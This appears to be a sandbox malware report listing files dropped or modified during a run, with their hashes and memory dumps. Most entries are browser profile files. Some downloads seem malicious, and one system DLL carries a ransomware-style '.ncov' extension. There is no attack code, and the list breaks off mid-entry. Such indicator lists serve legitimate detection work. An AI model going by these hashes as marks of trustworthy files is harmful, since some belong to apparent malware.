SHA512 7f16ad02e4bc7ffb0b6877306a751c50b7a85b3aac4c24fbab00e3b2f79926e403e9ee3f6a5cedb2ec1a6e18bfc31a17e67168e421757c514d43508d6f632416

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\datareporting\glean\db\data.safe.tmp

MD5 3a75267cb660bf27a18879b089ffc3ce
SHA1 be86b5dc4a43be515ed2a987bd0b74a9959afbd2
SHA256 a418f56f5ed006aa0a8b4ffa453c8682474c142233f23b4ed35fa7cfbe47d4b1
SHA512 e606bfd69def1e20febfa9404e63f7321da1592785c2abe3faafac60cdc9e81a7bd442f8e8416a685d172051824b8347dab3c80d53f138bbc01c98cbaaf585c9

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\prefs.js

MD5 933fc806d5ec3cb75d2cb30e1b3567e2
SHA1 bc22ed9f15c86772e0e2ab28986b6e60a4888a48
SHA256 968c9cc7d88cb3ff9446e12e5f05106e6b1b1cb22eab388ae9b2d84be88aa182
SHA512 d21ccb635883d11942ead8c1068d4d4ed361d80158a2905885fc827e6e1a75a5b08e797f911c2e45b3c5b813c99f1dd202a80f9b871d75c876d5acb3f4cd83f2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\prefs-1.js

MD5 a6aa7e694d5a1af79e917efc3d3882a2
SHA1 e831be74065854601c334da18950f4f490064162
SHA256 58cf83de5a04051bde76f919cecc37bee87cbb4e1b0ce2409d27407df1212b3e
SHA512 dbb4d6e71ec53090a100a85a03e8c86fcf6f6bb9589b88838f0595135075afdfe58edd6e9d4f1a1da513e50753d9f91cd8f38723f8b476bb8967b2df289ce648

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 20a0cd267695a326bb4c85dfac0568b5
SHA1 0ff5d03e4f52625ce6204dcd74b398c14f4652a9
SHA256 15defdc807b3f79f68aec26f416e7a39157c054fa432637ccd4664163255e749
SHA512 16d8e35c83813e2c9b90df595cbc97801082daf40d8b186d17a4c04aec69248c2894169f7ce4accb7d2d9d5dbbe612c53f340e4f1075a8a46d94ed11d73380ee

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 d51ff809c13a3a8786200df9bee461c6
SHA1 0fb181991213106daa55e4f886afe0fcf4241d74
SHA256 946e00c2ed8232c56ba48d691321f2df1788ccc45a0f908e7c57dc82d626f0d1
SHA512 65765026429130a5854a347b1d31ea9a5e6cd12cd14be3e83b5c620ad96c6fc73d34735fc80b8308bf5d19036525e4dbf989d395e4c45edfa179e66459b8ec4d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 956f4506231bfa76aba88e515f18b7eb
SHA1 e0766b0c82086b60c880583af662b19373f91e36
SHA256 2a5b9af12283fd873c4e4ab4fd93d13cbf94bb0701454151a96258a0d832e203
SHA512 37fe0587a692c8638f6433a23c414ad8d84c626564deea136d942d38e611a73ab93f09dc8d95503da635ccf6dac64ff8e9b64eca409211e487ea033becc160b0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 cc3c72d247da5dd78bb36d79d225739c
SHA1 86330791445724f54191c7669a877ce3d47fe5d6
SHA256 494a8a124bfdbb662c419abf7fbcd9174407f2566721ce1763e3c0722639a581
SHA512 9c47c49dcd1358a112f2cb8a983a164b6ccc053a99c726c9b7dce7c44baddedcbe5fa20ef2c367c107abdaac014e83e38f939d6058c4df6fe30e7a0753680af1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 29813e8068f1fa08719d94c30839b7d9
SHA1 54838964a0d33bf7b886d5fa856ceb5c539d5be4
SHA256 5dc7b6f4e474b96bb3ae9571592659005582c0cdda42ef2e4e6d800806e9d53c
SHA512 46a1106c2c887cd49a30f29b2176d3a989fd43de89fe1e1bfee10bfef032ee92b173d97a727854c54808fa2ff8c05d44f737ba7d8ff19e831b229a961ab6befb

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\extensions.json

MD5 c42557b3d85ef2ecc6d8efdca5464681
SHA1 c2a880afb49bd9644519cf9002ce0d128020df4c
SHA256 cc716fb90a5005caa328922e855e7a75a50b1af31bc5a0c4c4269b7a48cc3f80
SHA512 76d4a882a7fe73f018d3cc3e0e4ba2232f8516cc53f9f1fdf2c6aab8ece6cff394089c79cc831d5584179f74d178df34b44b376ac1abe17b0e79eed4456d0237

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\datareporting\glean\db\data.safe.tmp

MD5 3dfee9133806631dd9cf089b65abb1d5
SHA1 4fae3679e5f0e4d86075a6177cfae9805ff6eaa1
SHA256 7a1a3a4d0ffbc4eb3b271272ec590e5536267b5e20fd7352ccdcea9345c8fe52
SHA512 ca482cfde012ab1f8429df482f4de30535d3d712966d913e819285848524681d6eed170f309fbb2d54e5593794874e3d9543e41c6a54e2bf7f224df19ab59ae7

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 09372174e83dbbf696ee732fd2e875bb
SHA1 ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256 c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512 b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

MD5 2a461e9eb87fd1955cea740a3444ee7a
SHA1 b10755914c713f5a4677494dbe8a686ed458c3c5
SHA256 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA512 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

MD5 842039753bf41fa5e11b3a1383061a87
SHA1 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256 d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512 d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\AlternateServices.bin

MD5 5b0fc121539432bac13215a9c8676b06
SHA1 a0a9ca1fb49122f063ebba1ff1a61d4863f6ae4a
SHA256 ba0b6793e660ab022e58f82424adadf7d6e4d58cee82e895b3beb55c4e7bbc6e
SHA512 9314ad3d233154a23368ff02340cdc4c61e8e8f095beb41f519df47e2a7a606370972349ec67f1968a7ee6e125d88dc392db55ec6863931f2886dcde6cfa198a

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\prefs-1.js

MD5 babe3c78569ce7cea30ca261c4ba55cb
SHA1 8b965cfe306470cb954c4ec7a4b87728a805c622
SHA256 0805be989d84796442e60ce5e657cc8a3cb9110d6ec0ae5345e8cc63697f5a47
SHA512 1b141be8db60333ba9fd759ada08e573d04b930b1a1eb9c4a407e83b90770484296c4b6d49d05f60e8d60ed788578c19d65d4f998194bc17bee68c42da8ab0cf

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 0a8747a2ac9ac08ae9508f36c6d75692
SHA1 b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA256 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA512 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

MD5 bf957ad58b55f64219ab3f793e374316
SHA1 a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256 bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA512 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

MD5 daf7ef3acccab478aaa7d6dc1c60f865
SHA1 f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256 bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA512 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 f382fe7c8c90baf8c2e27a9a8db831fc
SHA1 5ac406b93c0cc7bac119f78c6c7254938ff3999f
SHA256 ee69c93429fa6fb744eeb2116a730daac43c9e856aa969c30c76ba458d6a8298
SHA512 8cee09e2ef3c18dc9b264448ff6ac81c99b396c9a334d68376b00627d9f31007a6ca8441e25f8c7519a57d420196a1e3c2ff7005ef2845ac910d6e25d942a916

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 b7aa73397f2ca4bd9c3e2632e31a0520
SHA1 05260f98ab091159e714807f5af99b7a8505c3b6
SHA256 fa5d035a81c5d79d112061e24585129777451562b7c743b9fe4e0997f5194437
SHA512 b0d96ed775c2fbcce0d6c77fecbd8e4c0681af5d69bcfeae68d8cd6701108cc5de7ae22844e7f6aa742c0ac0ac12b095b35b020bd227f87b3cf58dcda2c47f0f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe5e8da7.TMP

MD5 34489edfdac909b471c60b693a120987
SHA1 bd642494d42b390df37c7e074edf2a59e0203945
SHA256 9d33b064ae71115047a75f7205a5bd0052903de50652252440bbc7ec1f5b94f1
SHA512 f2c010838d144453480ba59e822ae27eb595afa168890350bcbc320dccb3b24f73e7696b09d9fd3dea7cb5b0ffc70f635437a2269e242bc3d90c1985d0c24e34

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 a08783ba0b3da6ed4b6062dcca0f7e36
SHA1 59d2d56a46b0676ffb4734ddaca640a1628ca849
SHA256 6511b4eee0d2ce4a27588d055d0b6c028e653d7f76de14926bb2b37d685405e2
SHA512 0629cb6e6c367058010ed8e1ea0c5aee5c4afa911239cf79ffd6bb8be94b46bb4107dd6595c7d140526d7a9dce53933a0aca887956fd95d93280ba5e380f98e6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 36904b61e3c9d9a99522c8d2ed451d4c
SHA1 86d2376659918e58596282f55e920ce52c4bc944
SHA256 6111e39977e9d4bb5abb5b01bb529184e8f6f9e7cecc180c5026f2f112401a17
SHA512 899932c2688d6d583ebf0930beda570f917140488cedbd2b01d2fd75bbd4e1a27512e2e9f0c6449ce47c46faa251367b1b166bbb7450b88305aa56fea4eba494

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 6f41e973333aed3e5d1efa44ec05216e
SHA1 6a321ff78fe5d8b9c1559a1e5cf8dc5dafd08e88
SHA256 38f7fd2ca65fc25b114ddac5adfff3b0a812cb53b3052c67cba4d41f49ba6600
SHA512 68c1e13955b4694c8f39cf6dcefd24d10da50d161edae4904a87726da627e2a6f9dd5b659febbdf631c0c055d9e7f0bf84bee06c97a50af0a9835db2ae86e18c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 eab3285fac0001adca66c32f4ed49133
SHA1 adc98c3ae8620fbdb67105a0393007b203c0c3be
SHA256 9f9eebabaf8383d18db97012788d9549f7ec40886acd924006ac964be07d685e
SHA512 13d080a70e3fb43f1a6bc2890b08a2d3753965001967bbd49313cdbc0aa49f406ea7a274ad39e0b6ba27caa40c4a1315861454a827a71008745fe9041ae971a6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7d74239f071433a36a2c0eb34117cba0
SHA1 d9fdb4171900fb5cbcbcb8965cb4aa76542fbb1a
SHA256 4ea52a83e9f3a139fa6ab2816d42aeed9b44d39accde461405047f72466f4304
SHA512 b19f047fc8c095163c6147188734b777236786679ebb0f7820ae2a73791da4da8774a60d8163737e520aa264e6ae4dbfc3ebc346c3d2290448e56eb307da46e0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 20de9fe99b0212489f21d040e9a25ef9
SHA1 0d8a9750ac4a2f3f493d36dc105509a69c4cf3f1
SHA256 8c27df0f0ff312fa7a6a266249910f9efa9ec572df32afe5b64341ed2023e015
SHA512 500219503b55bb5a5e231a98b35205d589fbeb99a52b8f213d4144f45d3e3a068402bc3635701c73b82f4de0e1b42b5649e368d9400b0525f84a5232a756476e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 3e74442bcff1ad6ab2a7a5258a8a72f1
SHA1 a38d2d1deb6c6c8cbc0f13c2216403899feca36e
SHA256 3353c0d592ef1507879e11e1b26335c406b0df09ca1ed8fc88103b5ef4eaf91b
SHA512 cfff8e46c6f310fad9c44398d12a947810a8dcd8fb4f523e8a4924a0e2c93e9d3bb87e3f1415077da3fed485a9a1883ca2ca4bce866a89468123a61498f2b3df

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002d

MD5 e33faed1fd92967a8aa6655e6096964f
SHA1 6574cc2124cb946b13d6e9d4b59e5a642818bbf6
SHA256 adb91e2604728d67c7b682816c4063fceb8f7531d66fa8288dc33cd7b7acc0c6
SHA512 624fc061a57d79f8e16b1f1cd1934fba44c0ae7f2d7dcb2745e3ca6a9285adb1f4c546a0a8c2459bbd195cca7b28bb4317e1547fe9737226ad884acca5dec319

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002e

MD5 1618fa09264c877aa3e5ffebd3f39acf
SHA1 c013865466ccfe4c871cde5c5ff38dfaf3bf3c6e
SHA256 e7c030a160a4e78524977bbdb0e02745e00e8d3cd63cbbbfc83cfd59ac66bb19
SHA512 bed04b251850c283966aa0d720dea5c0b804c22429988a026e072abca63c349d6d3255869161fa432f62ce5d9fcdd06a2132e4f7d9a57165e0fc01e0fca344cb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000034

MD5 15cbcae38534536bd9b4340b5e65a272
SHA1 4520b28887abcb1413b532af6e78d7813deecd49
SHA256 3b2fee49b6e76a1aec319c332aceaa8f7c7e01462508fb7995aab9741d1cf01c
SHA512 fc44d4c9779f59c1a71019c00ae91e373f780b83517e2b6a8a5241ccc74888fc3b009d5466605182981b588dd3740fa004f971f25bda495d6735f4012fbadc17

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000035

MD5 39c19c6eaf43544e607d370d220aaf10
SHA1 3964267711dc71bd93427f68bef35ee30b2eda1c
SHA256 f02a397a15b22676dcd93a2a2ef2ebe861b765c7cd07c12479e5cf676e153c10
SHA512 9a0ac7db4ac0b8da01a79515780d2eb18ba1c4e7b103fe6bff3414364e7973f46d064eabf5ef617f1dee9519b3454da22c49f74ae3752cc8064f7c23076d8f6c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 f0e7f60d645dbd032ef652ed7683fdd9
SHA1 cdfd4c05e04e8248b244296a17408e8b4b37236f
SHA256 40428f4a14267e3aacb91698c46afc6e661fb6adaa88c7f789465c30b97b77e8
SHA512 5ca391ff849f8c3512a6bfd7ef059d8602fe54ee3f00e1d20238cad1762bb6c0a8d9c6ceaebc9b9ceb02bf56c6786133daa0c14264e0c2ce72ab66a78c3ebc0b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 bfc96b2de3301915ab1a186dbf63db3a
SHA1 7752ebdef341c5057f820b251b5325bbdc6b2604
SHA256 d9de8d608bb2638ebb83e17a67170c7ad826a5bf1204231f352c70d2d9fc7743
SHA512 85fa1eeeda2d6270250071963d82475bb5d68bc6601e4058ae34906d22905e196a39c2cb696e05eaf5d4fae33da3b8b807d5f734feecff62d35f39ee01a8ba76

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 1831b89c76485a1e12ff70e6c8910546
SHA1 1b8436d2c23b5256c1e7ea87bd5efb73a6d6e470
SHA256 ad7ce1ed8a85ab477f42a1f2b4b2cbb7edcede90fc174acf3a8bb83cd4d43821
SHA512 278a92137e84db0c6ebbad8aaa621a0b5989ffdf395a289f3a3822b5a9f81a53efb058b6ae97be2884ae6a00bb5f6f83df2c5d158ddbd226e3e1099076c183a5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 1e4b5d9add0557be062e7cc25d79e01e
SHA1 1122bfc6bff8a47e771c12866e0f211f9c3439e2
SHA256 0d7280411d4ee77d049cbfe160618c68df90ea89ed4a8ab61bcc6d70feb6bb15
SHA512 e833ed823d35121bef463cc35d2ee10fd240950e6fa583d0ff65976a69414140a72f73be219ed4e165cb014758181706a40b4ff2d529f9a5b669e9abdd7aaa10

C:\Users\Admin\Downloads\Unconfirmed 277192.crdownload

MD5 63210f8f1dde6c40a7f3643ccf0ff313
SHA1 57edd72391d710d71bead504d44389d0462ccec9
SHA256 2aab13d49b60001de3aa47fb8f7251a973faa7f3c53a3840cdf5fd0b26e9a09f
SHA512 87a89e8ab85be150a783a9f8d41797cfa12f86fdccb48f2180c0498bfd2b1040b730dee4665fe2c83b98d436453680226051b7f1532e1c0e0cda0cf702e80a11

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 ba71416feef3be0733c7bca6702eb346
SHA1 adee6838363012304251a22cf1a5ba21ee754bb1
SHA256 e2b6829d271234c0265212f8d2cc8d96010897e0fb99237eb01b30ad986c2a4a
SHA512 a3ab8d369a8e9d117a914b0727bcafe385160847c1dfd1a27a9bc7096afe8477f28724012c2720b3b2ff5e1064594b110d5648c6a60182bd2c1180323ce2ba2a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 f10392096b40bd37e9d95cb63da7e225
SHA1 4978fdd5ba0a7000dcdf0d77fad4f797fb39bc90
SHA256 2f3459330966b31c5cc10e68d6e1683a94f2e1844fd29f029a4f48d9991a0581
SHA512 50e306e0c5129e6b2aca3e0932dc9f7f232e60d23168782492a5fa74c5d29e79cc0658d58ef0fe31a05284d1fe65a433ae1288d1e4319c4151ec41b6b8423558

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

MD5 9b8a184f089c0bc7061520ca85cf4735
SHA1 d195b50a2b1f57c53b23f711b46e7470e690736e
SHA256 b491585934b1f67024c08c1fc256c39d176941218bf9e41055326c1d62f6d98b
SHA512 63e4766b9b2407c8e698bc9cae7455ea0a9df280c46a34f1a06f7e3b7c0a5e80bbc60abae56998345a4ec231911f3874db6d6274047e4e6d5af5343ff56f7cfd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 1cc27937b5b78fb75babe65ffc61c0d9
SHA1 00eec5023c42f9330f4321807608f0674b306732
SHA256 bc868846988dd7fa627b062262553a492b5e7dde9d9ca4b148d6f738036f6584
SHA512 38a4d3a19009c53cd64b7a1ddfcee1d1b5c59332f1e69bec00c72694e3e8f9dacc1ca32aeb9097ce3a407ac45ddbbe6d445baa55f8909c929d11f585e158824c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 8b0f77157df70327f253f484d97bbd81
SHA1 71b0b4adb06502c12f89073d939e30b321abd8eb
SHA256 0117fa7eb8c71d782ff1a20a461c3c187e1663c33c6503188aef7982db90a535
SHA512 6ec95ec097b4f712dbcbdbd1d053ec8af49ad1ebe2776d1eba419b1f081233708c12f0bacc793ef38368ca4798e1a8454fcd1a2b383893459cb356c0d6daa5c4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 c779251b4a8435fa46e67cd4a5d918a9
SHA1 7aea03a7556f1ad6e47d8db0c84d480dd2322224
SHA256 98b0406a05a65e032a76682ec63fa95556726144b597be42a3c9a7a8fd362da3
SHA512 e7e91872be4153a24ef3af7d77f9f5b4f48ffc00ea8450a2a0d336320c51108907ea8320a7058dc39b7c977d58ffc26943bc65138b8ea5dbb4bcf70f99f2c1d2

memory/5424-3900-0x0000000000400000-0x00000000005DE000-memory.dmp

memory/5424-3901-0x0000000000400000-0x00000000005DE000-memory.dmp

memory/5424-3902-0x0000000000400000-0x00000000005DE000-memory.dmp

memory/5424-3904-0x0000000000400000-0x00000000005DE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 c7286d744638afc108401f0105ef47d0
SHA1 6a54bc87d4e210649bd5c694afd76aff3ba1bcd7
SHA256 6de37b75cca4fb4b4bd6ac04ebdd1d3aa2463f72183b445d6ee907a7825872a5
SHA512 2b680a55b3ca5daa3f74cb00f30d23e08f88740471722f41f77ae90990e02657ad82b28f1371952af3debabf8c37ca974a8255caf5981a2d808df0fd447b49f0

memory/4100-3921-0x0000000000400000-0x00000000005DE000-memory.dmp

memory/4100-3922-0x0000000000400000-0x00000000005DE000-memory.dmp

memory/5424-3927-0x0000000000400000-0x00000000005DE000-memory.dmp

memory/4100-3928-0x0000000000400000-0x00000000005DE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 795f517076b655527d9bd07af9f55724
SHA1 89dbdf0b5f51a69b8d89935e0a5eb940ad3309df
SHA256 a22894e73230331388d6cda22a59968169455dfeb5172f842fbd75756cf41a9d
SHA512 679169aa0587a6d4356840e9d6d3ea720dfbf2b57478b47d17df5465eb929a4a3335bcbdbf6f91b62e008241be008bd0eb24d7fed173f293e96a7bb8023b22a2

memory/5424-3950-0x0000000000400000-0x00000000005DE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00003b

MD5 055d1462f66a350d9886542d4d79bc2b
SHA1 f1086d2f667d807dbb1aa362a7a809ea119f2565
SHA256 dddf7894b2e6aafa1903384759d68455c3a4a8348a7e2da3bd272555eba9bec0
SHA512 2c5e570226252bdb2104c90d5b75f11493af8ed1be8cb0fd14e3f324311a82138753064731b80ce8e8b120b3fe7009b21a50e9f4583d534080e28ab84b83fee1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00003a

MD5 5009982b60a0f93eac4c1728e5ca17e2
SHA1 c0f932d333b91a4b971a52ce88bc96320745064f
SHA256 2ffc0ec332938cbce14008ab246c3d918800189aece932e92bedd8adb8332fe8
SHA512 401dd0a45c177130628787b92a17642783d27b1a977833af4110d81cbf2572a159a371beb473baa07ad38ac8297551aadadd2ebb80401a73acd580fdc03964aa

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000039

MD5 9196e81f8ed7f223d765423c1f9bc8a7
SHA1 88f9d5c2a6908cf36b8daae803578ca9e1fd2929
SHA256 a4e2bcf7ef3c6c614c2142d3c1fd44caac4eafa86a1779ac31cba164e2d89cbe
SHA512 e7d23866fcac017762d2e2f18597124e9147f458d30038f78ba9f3a2bcbe479fe4792573894370ce2d6f93a00401231d9f01955fde351ff982a82ba87a8241f8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 ac3070bf987e3b507675143b95f4523a
SHA1 df9903ee55bda080c94706862275e99dc1338911
SHA256 0a998d4bf94b256cdbc326fee7aad765d3ec9866077c7c6c701b10ee08e89444
SHA512 138bacc44ad59b4ce7761257b8225ed52cb003225c680ba034127023e93a158e9186afb7e978011a907b9c7d4f299e6f14093d58f868be940444d53d2a3d4873

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

MD5 f7a61cc988c4e55e366963ed20dacdb6
SHA1 f0727eb9ede1f2a20f8b01a0ee00832894ed4e3a
SHA256 ad711a5b2e38e46e184db3a7eef192feb694aa00f961fcf0b58e479db6edfd3f
SHA512 6d3c4a4e5ff99e578bc67af1bc672207efd4051e341bf9a4676d6b2e6e3be6d6fc117033f2f7c65bb54bc94a30005b620c50067b9f6f9479461998c70c9042a5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 d5b99fe962bd46556ef03748d79790b1
SHA1 5ea60eaaa452a5a7b156e46a78123e40a6aa58ab
SHA256 2baf303c53a30714b5d3222f70c3b8cdc97f549809231bd1c07fa1a6f0188ee6
SHA512 a5be45da195a332c562aaa32e8ab6b0bb9f54dba3d9e6bef418fbe69d4d7e1aeeb975e4f2d0014d5a331b3899d367b40d5a4594bca8a6e306b0fd44a83efb686

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 36d652ddc4d0aa2ea6f99dab56889458
SHA1 4f35cbcbcd956060729c02890aa8a0dae24ab794
SHA256 130ba9c30006c77faab1e67559363ed2a7804337f57b0e1aa9ddeddfacfea42d
SHA512 0f38a6397b290d4a56823d85f2e78fffd9928c3df85ca3e6878be553c9043019afb1511a90b9bb7c0dee7d0ddb6c02ead71137b6fac1b1338bec18fc514c614a

memory/2736-4058-0x0000000000400000-0x000000000056F000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 4fc2146150fec86b209458aba1056508
SHA1 08d169ceda2b0a45f044ffa7796c767ac0b2a8f2
SHA256 b688a7d1d1699cda02b97b559dea306dfd7f9f9ca2b5ca3843237e561268c0b3
SHA512 a1bf436adcd0bb9e909048d70bec1b359ef141147077d2c9f134d4f2dd2b7cbe729858c5c4060132e34b59694d63905620dc2e55d58f3fa38d48a019e3b04e28

C:\Program Files\Common Files\microsoft shared\ClickToRun\C2R64.dll.id-A86C441F.[[email protected]].ncov

MD5 68d9b9c086830c468ab309d94ef74783
SHA1 7d8fcb2b84baa1d35b6fb12892aa8faca4151c28
SHA256 dd77f92b3a25c83fe420ac094b5d5dcb646c54101dbb4e818599d12b057e9507
SHA512 9c68af6ffef146a0f8e0ebe94433b73cb77648b00b5d84e805d4dde7ce04e20b1e0efdd2abadcf5822418d0394579a670b4b02b90a36a8b193af042d629bb0dc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 5a1a2a16ae2d4502c8cec3eb2afe5cb0
SHA1 d12968d0aa7d6cb725b97a8c7110a8a245a9a653
SHA256 634d441d01600ea244ebce8a6b4d3e5ed1db677c45ba5ffc938d02f7ecb7b8bf
SHA512 1512b3d29ef8bf726df0e5fa81a95dde93d70328e1c747b2d1c4092a6fc4e9aba7219ceb9778a4c00190119b97b1cce9bc56a7e52a86e4ea041fedb5ee99f898

C:\Users\Admin\Downloads\Unconfirmed 412718.crdownload

MD5 cce284cab135d9c0a2a64a7caec09107
SHA1 e4b8f4b6cab18b9748f83e9fffd275ef5276199e
SHA256 18aab0e981eee9e4ef8e15d4b003b14b3a1b0bfb7233fade8ee4b6a22a5abbb9
SHA512 c45d021295871447ce60250ff9cbeba2b2a16a23371530da077d6235cfe5005f10fa228071542df3621462d913ad2f58236dc0c0cb390779eef86a10bba8429f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 d3166d12af7b03dcf57cec5726ad2575
SHA1 8115e0841656a98228a4e86d21d04aa45c2c7932
SHA256 46df1de7f19d2ac928b512e5be1b0df5f6e45d02ad6dfb60a4374d749490af19
SHA512 d109a4b4bd80c4717388a65990e8c48cbf2e4c19576d511d21602e5b441d278f35e4e0ad36bda17654c793624ef6891b63938e9bd1b0259198a30a80992b2938

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe61d7b2.TMP

MD5 c1891f1c6bff4b527edc8a04d3450658
SHA1 6e040f95db64968d70a8f48bdcbb4347ff186c73
SHA256 20593105debf4bb484b9b6e0040c0da0cda020cac217ee18e538f4367a467508
SHA512 2ac78492ee693c26eeeb7814f6975dec0d22e5e9220410c6d685becbcc7dd8a9ca0afce3ed93862d8707a626903258b894b527984242993a98ffcfd23817bdb9

C:\Users\Admin\Downloads\Unconfirmed 423497.crdownload

MD5 1535aa21451192109b86be9bcc7c4345
SHA1 1af211c686c4d4bf0239ed6620358a19691cf88c
SHA256 4641af6a0071e11e13ad3b1cd950e01300542c2b9efb6ae92ffecedde974a4a6
